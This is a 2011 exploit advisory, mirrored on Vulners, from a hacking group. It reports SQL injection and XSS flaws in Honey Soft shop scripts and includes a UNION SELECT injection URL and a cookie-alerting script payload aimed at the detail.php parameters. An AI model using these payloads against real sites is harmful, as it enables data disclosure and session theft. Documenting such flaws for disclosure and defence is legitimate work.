Vulners
Lucene search
Honey Soft Web Solution Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
Honey Soft (detail.php?prod_detail= & products.php?catid=) SQL-i/XSS Multiple Vulnerabilities
-----------------------------------------------------------------------------------------
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - EaglE EyE - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title Honey Soft (detail.php?prod_detail= & products.php?catid=) SQL-i/XSS Multiple Vulnerabilities
[+]Author **RoAd_KiLlEr**
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com
[~] Vendor: http://www.honeysoft.net/
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Dork: No DOrk for Lamerz !!
==========================================
[ I ]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
[+] Description:
All the web sites that are developed by Honeysoft use the same script.
But the script is prone to SQL inection.
Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
==========================================
[P0C]: http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection]
[D3m0]: http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection]
[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--
[ II ]. XSS-Injection Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+
[+] Description:
Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
=========================================================
[P0C]: http://127.0.0.1/path/detail.php?prod_detail=[XSS]
[Atack Pattern]: "><script>alert(document.cookie)</script>
[L!v3 D3m0]: http://www.site.com/detail.php?prod_detail="><script>alert(document.cookie)</script>
[+] TIME TABLE:
26 March 2011 - Vulnerability discovered.
26 March 2011 - Vendor Notified.
26 March 2011 - Sent to vendor all data.
27 March 2011 - Vendor replied.
27 March 2011 - Advisory released.
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | MaFFiTeRRoR | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1